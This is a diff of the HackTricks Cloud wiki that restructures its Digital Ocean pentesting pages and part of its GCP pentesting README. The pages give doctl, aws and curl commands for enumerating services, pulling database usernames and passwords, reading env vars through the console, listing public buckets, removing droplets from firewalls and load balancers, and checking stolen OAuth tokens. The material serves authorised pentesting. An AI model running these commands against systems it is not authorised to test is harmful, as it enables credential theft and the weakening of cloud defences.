@@ -0,0 +1,43 @@ +# Digital Ocean Pentesting + +{{#include ../../banners/hacktricks-training.md}} + +## Basic Information + +**Before start pentesting** a Digital Ocean environment there are a few **basics things you need to know** about how DO works to help you understand what you need to do, how to find misconfigurations and how to exploit them. + +Concepts such as hierarchy, access and other basic concepts are explained in: + +{{#ref}} +do-basic-information.md +{{#endref}} + +## Basic Enumeration + +### SSRF + +{{#ref}} +https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf +{{#endref}} + +### Projects + +To get a list of the projects and resources running on each of them from the CLI check: + +{{#ref}} +do-services/do-projects.md +{{#endref}} + +### Whoami + +```bash +doctl account get +``` + +## Services Enumeration + +{{#ref}} +do-services/ +{{#endref}} + +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-basic-information.md b/src/pentesting-cloud/digital-ocean-pentesting/do-basic-information.md similarity index 73% rename from pentesting-cloud/digital-ocean-pentesting/do-basic-information.md rename to src/pentesting-cloud/digital-ocean-pentesting/do-basic-information.md index 6e93e0b75..b6f64e516 100644 --- a/pentesting-cloud/digital-ocean-pentesting/do-basic-information.md +++ b/src/pentesting-cloud/digital-ocean-pentesting/do-basic-information.md @@ -1,19 +1,6 @@ # DO - Basic Information -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} ## Basic Information 
@@ -21,10 +8,10 @@ DigitalOcean is a **cloud computing platform that provides users with a variety Some of the key features of DigitalOcean include: -* **Virtual private servers (VPS)**: DigitalOcean provides VPS that can be used to host websites and applications. These VPS are known for their simplicity and ease of use, and can be quickly and easily deployed using a variety of pre-built "droplets" or custom configurations. -* **Storage**: DigitalOcean offers a range of storage options, including object storage, block storage, and managed databases, that can be used to store and manage data for websites and applications. -* **Development and deployment tools**: DigitalOcean provides a range of tools that can be used to build, deploy, and manage applications, including APIs and pre-built droplets. -* **Security**: DigitalOcean places a strong emphasis on security, and offers a range of tools and features to help users keep their data and applications safe. This includes encryption, backups, and other security measures. +- **Virtual private servers (VPS)**: DigitalOcean provides VPS that can be used to host websites and applications. These VPS are known for their simplicity and ease of use, and can be quickly and easily deployed using a variety of pre-built "droplets" or custom configurations. +- **Storage**: DigitalOcean offers a range of storage options, including object storage, block storage, and managed databases, that can be used to store and manage data for websites and applications. +- **Development and deployment tools**: DigitalOcean provides a range of tools that can be used to build, deploy, and manage applications, including APIs and pre-built droplets. +- **Security**: DigitalOcean places a strong emphasis on security, and offers a range of tools and features to help users keep their data and applications safe. This includes encryption, backups, and other security measures. 
Overall, DigitalOcean is a cloud computing platform that provides users with the tools and resources they need to build, deploy, and manage applications in the cloud. Its services are designed to be simple and easy to use, making them popular among developers and small businesses. @@ -143,19 +130,6 @@ The **logs of a team** can be found in [**https://cloud.digitalocean.com/account ## References -* [https://docs.digitalocean.com/products/teams/how-to/manage-membership/](https://docs.digitalocean.com/products/teams/how-to/manage-membership/) +- [https://docs.digitalocean.com/products/teams/how-to/manage-membership/](https://docs.digitalocean.com/products/teams/how-to/manage-membership/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md b/src/pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md
new file mode 100644
index 000000000..d8742796e
--- /dev/null
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md
@@ -0,0 +1,7 @@
+# DO - Permissions for a Pentest
+
+{{#include ../../banners/hacktricks-training.md}}
+
+DO doesn't support granular permissions. So the **minimum role** that allows a user to review all the resources is **member**. A pentester with this permission will be able to perform harmful activities, but it's what it's.
+
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/digital-ocean-pentesting/do-services/README.md b/src/pentesting-cloud/digital-ocean-pentesting/do-services/README.md
new file mode 100644
index 000000000..1a7ac183b
--- /dev/null
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/README.md
@@ -0,0 +1,19 @@
+# DO - Services
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+DO offers a few services, here you can find how to **enumerate them:**
+
+- [**Apps**](do-apps.md)
+- [**Container Registry**](do-container-registry.md)
+- [**Databases**](do-databases.md)
+- [**Droplets**](do-droplets.md)
+- [**Functions**](do-functions.md)
+- [**Images**](do-images.md)
+- [**Kubernetes (DOKS)**](do-kubernetes-doks.md)
+- [**Networking**](do-networking.md)
+- [**Projects**](do-projects.md)
+- [**Spaces**](do-spaces.md)
+- [**Volumes**](do-volumes.md)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md
new file mode 100644
index 000000000..03c70acee
--- /dev/null
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md
@@ -0,0 +1,34 @@
+# DO - Apps
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+[From the docs:](https://docs.digitalocean.com/glossary/app-platform/) App Platform is a Platform-as-a-Service (PaaS) offering that allows developers to **publish code directly to DigitalOcean** servers without worrying about the underlying infrastructure.
+
+You can run code directly from **github**, **gitlab**, **docker hub**, **DO container registry** (or a sample app).
+
+When defining an **env var** you can set it as **encrypted**. The only way to **retreive** its value is executing **commands** inside the host runnig the app.
+
+An **App URL** looks like this [https://dolphin-app-2tofz.ondigitalocean.app](https://dolphin-app-2tofz.ondigitalocean.app)
+
+### Enumeration
+
+```bash
+doctl apps list # You should get URLs here
+doctl apps spec get # Get yaml (including env vars, might be encrypted)
+doctl apps logs # Get HTTP logs
+doctl apps list-alerts # Get alerts
+doctl apps list-regions # Get available regions and the default one
+```
+
+> [!CAUTION]
+> **Apps doesn't have metadata endpoint**
+
+### RCE & Encrypted env vars
+
+To execute code directly in the container executing the App you will need **access to the console** and go to **`https://cloud.digitalocean.com/apps//console/`**.
+
+That will give you a **shell**, and just executing **`env`** you will be able to see **all the env vars** (including the ones defined as **encrypted**).
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md
new file mode 100644
index 000000000..964b0cf0c
--- /dev/null
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md
@@ -0,0 +1,33 @@ +# DO - Container Registry + +{{#include ../../../banners/hacktricks-training.md}} + +## Basic Information + +DigitalOcean Container Registry is a service provided by DigitalOcean that **allows you to store and manage Docker images**. It is a **private** registry, which means that the images that you store in it are only accessible to you and users that you grant access to. This allows you to securely store and manage your Docker images, and use them to deploy containers on DigitalOcean or any other environment that supports Docker. + +When creating a Container Registry it's possible to **create a secret with pull images access (read) over it in all the namespaces** of Kubernetes clusters. + +### Connection + +```bash +# Using doctl +doctl registry login + +# Using docker (You need an API token, use it as username and as password) +docker login registry.digitalocean.com +Username: +Password: +``` + +### Enumeration + +```bash +# Get creds to access the registry from the API +doctl registry docker-config + +# List +doctl registry repository list-v2 +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md new file mode 100644 index 000000000..99d1d96f9 --- /dev/null +++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md 
@@ -0,0 +1,43 @@ +# DO - Databases + +{{#include ../../../banners/hacktricks-training.md}} + +## Basic Information + +With DigitalOcean Databases, you can easily **create and manage databases in the cloud** without having to worry about the underlying infrastructure. The service offers a variety of database options, including **MySQL**, **PostgreSQL**, **MongoDB**, and **Redis**, and provides tools for administering and monitoring your databases. DigitalOcean Databases is designed to be highly scalable, reliable, and secure, making it an ideal choice for powering modern applications and websites. + +### Connections details + +When creating a database you can select to configure it **accessible from a public network**, or just from inside a **VPC**. Moreover, it request you to **whitelist IPs that can access it** (your IPv4 can be one). + +The **host**, **port**, **dbname**, **username**, and **password** are shown in the **console**. You can even download the AD certificate to connect securely. + +```bash +sql -h db-postgresql-ams3-90864-do-user-2700959-0.b.db.ondigitalocean.com -U doadmin -d defaultdb -p 25060 +``` + +### Enumeration + +```bash +# Databse clusters +doctl databases list + +# Auth +doctl databases get # This shows the URL with CREDENTIALS to access +doctl databases connection # Another way to egt credentials +doctl databases user list # Get all usernames and passwords + +# Dbs inside a database cluster +doctl databases db list + +# Firewall (allowed IPs), you can also add +doctl databases firewalls list + +# Backups +doctl databases backups # List backups of DB + +# Pools +doctl databases pool list # List pools of DB +``` + +{{#include ../../../banners/hacktricks-training.md}} 
diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.md b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.md similarity index 57% rename from pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.md rename to src/pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.md index b1cb6a795..bb4798592 100644 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.md +++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.md @@ -1,19 +1,6 @@ # DO - Droplets -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Basic Information @@ -45,15 +32,14 @@ For authentication it's possible to **enable SSH** through username and **passwo ### Firewall -{% hint style="danger" %} -By default **droplets are created WITHOUT A FIREWALL** (not like in oder clouds such as AWS or GCP). So if you want DO to protect the ports of the droplet (VM), you need to **create it and attach it**. -{% endhint %} +> [!CAUTION] +> By default **droplets are created WITHOUT A FIREWALL** (not like in oder clouds such as AWS or GCP). So if you want DO to protect the ports of the droplet (VM), you need to **create it and attach it**. More info in: -{% content-ref url="do-networking.md" %} -[do-networking.md](do-networking.md) -{% endcontent-ref %} +{{#ref}} +do-networking.md +{{#endref}} ### Enumeration @@ -83,9 +69,8 @@ doctl compute certificate list doctl compute snapshot list ``` -{% hint style="danger" %} -**Droplets have metadata endpoints**, but in DO there **isn't IAM** or things such as role from AWS or service accounts from GCP. -{% endhint %} +> [!CAUTION] +> **Droplets have metadata endpoints**, but in DO there **isn't IAM** or things such as role from AWS or service accounts from GCP. ### RCE @@ -93,17 +78,4 @@ With access to the console it's possible to **get a shell inside the droplet** a It's also possible to launch a **recovery console** to run commands inside the host accessing a recovery console in **`https://cloud.digitalocean.com/droplets//console`**(but in this case you will need to know the root password). -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md new file mode 100644 index 000000000..c167d4ffa --- /dev/null +++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md 
@@ -0,0 +1,60 @@ +# DO - Functions + +{{#include ../../../banners/hacktricks-training.md}} + +## Basic Information + +DigitalOcean Functions, also known as "DO Functions," is a serverless computing platform that lets you **run code without having to worry about the underlying infrastructure**. With DO Functions, you can write and deploy your code as "functions" that can be **triggered** via **API**, **HTTP requests** (if enabled) or **cron**. These functions are executed in a fully managed environment, so you **don't need to worry** about scaling, security, or maintenance. + +In DO, to create a function first you need to **create a namespace** which will be **grouping functions**.\ +Inside the namespace you can then create a function. + +### Triggers + +The way **to trigger a function via REST API** (always enabled, it's the method the cli uses) is by triggering a request with an **authentication token** like: + +```bash +curl -X POST "https://faas-lon1-129376a7.doserverless.co/api/v1/namespaces/fn-c100c012-65bf-4040-1230-2183764b7c23/actions/functionname?blocking=true&result=true" \ + -H "Content-Type: application/json" \ + -H "Authorization: Basic MGU0NTczZGQtNjNiYS00MjZlLWI2YjctODk0N2MyYTA2NGQ4OkhwVEllQ2t4djNZN2x6YjJiRmFGc1FERXBySVlWa1lEbUxtRE1aRTludXA1UUNlU2VpV0ZGNjNqWnVhYVdrTFg=" +``` + +To see how is the **`doctl`** cli tool getting this token (so you can replicate it), the **following command shows the complete network trace:** + +```bash +doctl serverless connect --trace +``` + +**When HTTP trigger is enabled**, a web function can be invoked through these **HTTP methods GET, POST, PUT, PATCH, DELETE, HEAD and OPTIONS**. + +> [!CAUTION] +> In DO functions, **environment variables cannot be encrypted** (at the time of this writing).\ +> I couldn't find any way to read them from the CLI but from the console it's straight forward. 
+ +**Functions URLs** look like this: `https://.doserverless.co/api/v1/web//default/` + +### Enumeration + +```bash +# Namespace +doctl serverless namespaces list + +# Functions (need to connect to a namespace) +doctl serverless connect +doctl serverless functions list +doctl serverless functions invoke +doctl serverless functions get + +# Logs of executions +doctl serverless activations list +doctl serverless activations get # Get all the info about execution +doctl serverless activations logs # get only the logs of execution +doctl serverless activations result # get only the response result of execution + +# I couldn't find any way to get the env variables form the CLI +``` + +> [!CAUTION] +> There **isn't metadata endpoint** from the Functions sandbox. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md new file mode 100644 index 000000000..b816a1c13 --- /dev/null +++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md 
@@ -0,0 +1,19 @@ +# DO - Images + +{{#include ../../../banners/hacktricks-training.md}} + +## Basic Information + +DigitalOcean Images are **pre-built operating system or application images** that can be used to create new Droplets (virtual machines) on DigitalOcean. They are similar to virtual machine templates, and they allow you to **quickly and easily create new Droplets with the operating system** and applications that you need. + +DigitalOcean provides a wide range of Images, including popular operating systems such as Ubuntu, CentOS, and FreeBSD, as well as pre-configured application Images such as LAMP, MEAN, and LEMP stacks. You can also create your own custom Images, or use Images from the community. + +When you create a new Droplet on DigitalOcean, you can choose an Image to use as the basis for the Droplet. This will automatically install the operating system and any pre-installed applications on the new Droplet, so you can start using it right away. Images can also be used to create snapshots and backups of your Droplets, so you can easily create new Droplets from the same configuration in the future. + +### Enumeration + +``` +doctl compute image list +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md new file mode 100644 index 000000000..34ed44fb9 --- /dev/null +++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md 
@@ -0,0 +1,39 @@ +# DO - Kubernetes (DOKS) + +{{#include ../../../banners/hacktricks-training.md}} + +## Basic Information + +### DigitalOcean Kubernetes (DOKS) + +DOKS is a managed Kubernetes service offered by DigitalOcean. The service is designed to **deploy and manage Kubernetes clusters on DigitalOcean's platform**. The key aspects of DOKS include: + +1. **Ease of Management**: The requirement to set up and maintain the underlying infrastructure is eliminated, simplifying the management of Kubernetes clusters. +2. **User-Friendly Interface**: It provides an intuitive interface that facilitates the creation and administration of clusters. +3. **Integration with DigitalOcean Services**: It seamlessly integrates with other services provided by DigitalOcean, such as Load Balancers and Block Storage. +4. **Automatic Updates and Upgrades**: The service includes the automatic updating and upgrading of clusters to ensure they are up-to-date. + +### Connection + +```bash +# Generate kubeconfig from doctl +doctl kubernetes cluster kubeconfig save + +# Use a kubeconfig file that you can download from the console +kubectl --kubeconfig=//k8s-1-25-4-do-0-ams3-1670939911166-kubeconfig.yaml get nodes +``` + +### Enumeration + +```bash +# Get clusters +doctl kubernetes cluster list + +# Get node pool of cluster (number of nodes) +doctl kubernetes cluster node-pool list + +# Get DO resources used by the cluster +doctl kubernetes cluster list-associated-resources +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md new file mode 100644 index 000000000..c6bf58b8d --- /dev/null +++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md 
@@ -0,0 +1,45 @@ +# DO - Networking + +{{#include ../../../banners/hacktricks-training.md}} + +### Domains + +```bash +doctl compute domain list +doctl compute domain records list +# You can also create records +``` + +### Reserverd IPs + +```bash +doctl compute reserved-ip list +doctl compute reserved-ip-action unassign +``` + +### Load Balancers + +```bash +doctl compute load-balancer list +doctl compute load-balancer remove-droplets --droplet-ids 12,33 +doctl compute load-balancer add-forwarding-rules --forwarding-rules entry_protocol:tcp,entry_port:3306,... +``` + +### VPC + +``` +doctl vpcs list +``` + +### Firewall + +> [!CAUTION] +> By default **droplets are created WITHOUT A FIREWALL** (not like in oder clouds such as AWS or GCP). So if you want DO to protect the ports of the droplet (VM), you need to **create it and attach it**. + +```bash +doctl compute firewall list +doctl compute firewall list-by-droplet +doctl compute firewall remove-droplets --droplet-ids +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md new file mode 100644 index 000000000..9c164f747 --- /dev/null +++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md 
@@ -0,0 +1,23 @@ +# DO - Projects + +{{#include ../../../banners/hacktricks-training.md}} + +## Basic Information + +> project is just a container for all the **services** (droplets, spaces, databases, kubernetes...) **running together inside of it**.\ +> For more info check: + +{{#ref}} +../do-basic-information.md +{{#endref}} + +### Enumeration + +It's possible to **enumerate all the projects a user have access to** and all the resources that are running inside a project very easily: + +```bash +doctl projects list # Get projects +doctl projects resources list # Get all the resources of a project +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md new file mode 100644 index 000000000..bbb985e64 --- /dev/null +++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md 
@@ -0,0 +1,46 @@ +# DO - Spaces + +{{#include ../../../banners/hacktricks-training.md}} + +## Basic Information + +DigitalOcean Spaces are **object storage services**. They allow users to **store and serve large amounts of data**, such as images and other files, in a scalable and cost-effective way. Spaces can be accessed via the DigitalOcean control panel, or using the DigitalOcean API, and are integrated with other DigitalOcean services such as Droplets (virtual private servers) and Load Balancers. + +### Access + +Spaces can be **public** (anyone can access them from the Internet) or **private** (only authorised users). To access the files from a private space outside of the Control Panel, we need to generate an **access key** and **secret**. These are a pair of random tokens that serve as a **username** and **password** to grant access to your Space. + +A **URL of a space** looks like this: **`https://uniqbucketname.fra1.digitaloceanspaces.com/`**\ +Note the **region** as **subdomain**. + +Even if the **space** is **public**, **files** **inside** of it can be **private** (you will be able to access them only with credentials). + +However, **even** if the file is **private**, from the console it's possible to share a file with a link such as `https://fra1.digitaloceanspaces.com/uniqbucketname/filename?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=DO00PL3RA373GBV4TRF7%2F20221213%2Ffra1%2Fs3%2Faws4_request&X-Amz-Date=20221213T121017Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Signature=6a183dbc42453a8d30d7cd2068b66aeb9ebc066123629d44a8108115def975bc` for a period of time: + +
+ +### Enumeration + +```bash +# Unauthenticated +## Note how the region is specified in the endpoint +aws s3 ls --endpoint=https://fra1.digitaloceanspaces.com --no-sign-request s3://uniqbucketname + +# Authenticated +## Configure spaces keys as AWS credentials +aws configure +AWS Access Key ID [None]: +AWS Secret Access Key [None]: +Default region name [None]: +Default output format [None]: + +## List all buckets in a region +aws s3 ls --endpoint=https://fra1.digitaloceanspaces.com + +## List files inside a bucket +aws s3 ls --endpoint=https://fra1.digitaloceanspaces.com s3://uniqbucketname + +## It's also possible to generate authorized access to buckets from the API +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md new file mode 100644 index 000000000..95041a406 --- /dev/null +++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md @@ -0,0 +1,15 @@ +# DO - Volumes + +{{#include ../../../banners/hacktricks-training.md}} + +## Basic Information + +DigitalOcean volumes are **block storage** devices that can be **attached to and detached from Droplets**. Volumes are useful for **storing data** that needs to **persist** independently of the Droplet itself, such as databases or file storage. They can be resized, attached to multiple Droplets, and snapshot for backups. + +### Enumeration + +``` +compute volume list +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/gcp-security/README.md b/src/pentesting-cloud/gcp-security/README.md similarity index 55% rename from pentesting-cloud/gcp-security/README.md rename to src/pentesting-cloud/gcp-security/README.md index 5cf35ed29..1b74bb6b0 100644 --- a/pentesting-cloud/gcp-security/README.md +++ b/src/pentesting-cloud/gcp-security/README.md 
@@ -1,19 +1,6 @@ # GCP Pentesting -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} ## Basic Information @@ -21,16 +8,16 @@ Learn & practice GCP Hacking: [!NOTE] +> After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration: ## Basic Enumeration @@ -71,13 +57,14 @@ After you have managed to obtain credentials, you need to know **to who do those For more information about how to **enumerate GCP metadata** check the following hacktricks page: -{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#6440" %} +{{#ref}} +https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#6440 +{{#endref}} ### Whoami In GCP you can try several options to try to guess who you are: -{% code overflow="wrap" %} ```bash #If you are inside a compromise machine gcloud auth list @@ -87,17 +74,14 @@ gcloud auth print-identity-token #Get info from the token #If you compromised a metadata token or somehow found an OAuth token curl -H "Content-Type: application/x-www-form-urlencoded" -d "access_token=" https://www.googleapis.com/oauth2/v1/tokeninfo ``` -{% endcode %} You can also use the API endpoint `/userinfo` to get more info about the user: -{% code overflow="wrap" %} ```bash curl -H "Content-Type: application/x-www-form-urlencoded" -H "Authorization: OAuth $(gcloud auth print-access-token)" https://www.googleapis.com/oauth2/v1/userinfo curl -H "Content-Type: application/x-www-form-urlencoded" -H "Authorization: OAuth " https://www.googleapis.com/oauth2/v1/userinfo ``` -{% endcode %} ### Org Enumeration 
@@ -115,30 +99,29 @@ If you have enough permissions, **checking the privileges of each entity inside If you don't have enough permissions to enumerate IAM, you can **steal brute-force them** to figure them out.\ Check **how to do the numeration and brute-forcing** in: -{% content-ref url="gcp-services/gcp-iam-and-org-policies-enum.md" %} -[gcp-iam-and-org-policies-enum.md](gcp-services/gcp-iam-and-org-policies-enum.md) -{% endcontent-ref %} +{{#ref}} +gcp-services/gcp-iam-and-org-policies-enum.md +{{#endref}} -{% hint style="info" %} -Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\ -In the following section you can check some ways to **enumerate some common services.** -{% endhint %} +> [!NOTE] +> Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\ +> In the following section you can check some ways to **enumerate some common services.** ## Services Enumeration GCP has an astonishing amount of services, in the following page you will find **basic information, enumeration** cheatsheets, how to **avoid detection**, obtain **persistence**, and other **post-exploitation** tricks about some of them: -{% content-ref url="gcp-services/" %} -[gcp-services](gcp-services/) -{% endcontent-ref %} +{{#ref}} +gcp-services/ +{{#endref}} Note that you **don't** need to perform all the work **manually**, below in this post you can find a **section about** [**automatic tools**](./#automatic-tools). 
Moreover, in this stage you might discovered **more services exposed to unauthenticated users,** you might be able to exploit them: -{% content-ref url="gcp-unauthenticated-enum-and-access/" %} -[gcp-unauthenticated-enum-and-access](gcp-unauthenticated-enum-and-access/) -{% endcontent-ref %} +{{#ref}} +gcp-unauthenticated-enum-and-access/ +{{#endref}} ## Privilege Escalation, Post Exploitation & Persistence @@ -146,17 +129,17 @@ The most common way once you have obtained some cloud credentials or have compro Moreover, during this enumeration, remember that **permissions can be set at the highest level of "Organization"** as well. -{% content-ref url="gcp-privilege-escalation/" %} -[gcp-privilege-escalation](gcp-privilege-escalation/) -{% endcontent-ref %} +{{#ref}} +gcp-privilege-escalation/ +{{#endref}} -{% content-ref url="gcp-post-exploitation/" %} -[gcp-post-exploitation](gcp-post-exploitation/) -{% endcontent-ref %} +{{#ref}} +gcp-post-exploitation/ +{{#endref}} -{% content-ref url="gcp-persistence/" %} -[gcp-persistence](gcp-persistence/) -{% endcontent-ref %} +{{#ref}} +gcp-persistence/ +{{#endref}} ### Publicly Exposed Services 
@@ -165,22 +148,24 @@ As pentester/red teamer you should always check if you can find **sensitive info In this book you should find **information** about how to find **exposed GCP services and how to check them**. About how to find **vulnerabilities in exposed network services** I would recommend you to **search** for the specific **service** in: -{% embed url="https://book.hacktricks.xyz/" %} +{{#ref}} +https://book.hacktricks.xyz/ +{{#endref}} ## GCP <--> Workspace Pivoting **Compromising** principals in **one** platform might allow an attacker to **compromise the other one**, check it in: -{% content-ref url="gcp-to-workspace-pivoting/" %} -[gcp-to-workspace-pivoting](gcp-to-workspace-pivoting/) -{% endcontent-ref %} +{{#ref}} +gcp-to-workspace-pivoting/ +{{#endref}} ## Automatic Tools -* In the **GCloud console**, in [https://console.cloud.google.com/iam-admin/asset-inventory/dashboard](https://console.cloud.google.com/iam-admin/asset-inventory/dashboard) you can see resources and IAMs being used by project. - * Here you can see the assets supported by this API: [https://cloud.google.com/asset-inventory/docs/supported-asset-types](https://cloud.google.com/asset-inventory/docs/supported-asset-types) -* Check **tools** that can be [**used in several clouds here**](../pentesting-cloud-methodology.md). -* [**gcp\_scanner**](https://github.com/google/gcp_scanner): This is a GCP resource scanner that can help determine what **level of access certain credentials posses** on GCP. +- In the **GCloud console**, in [https://console.cloud.google.com/iam-admin/asset-inventory/dashboard](https://console.cloud.google.com/iam-admin/asset-inventory/dashboard) you can see resources and IAMs being used by project. 
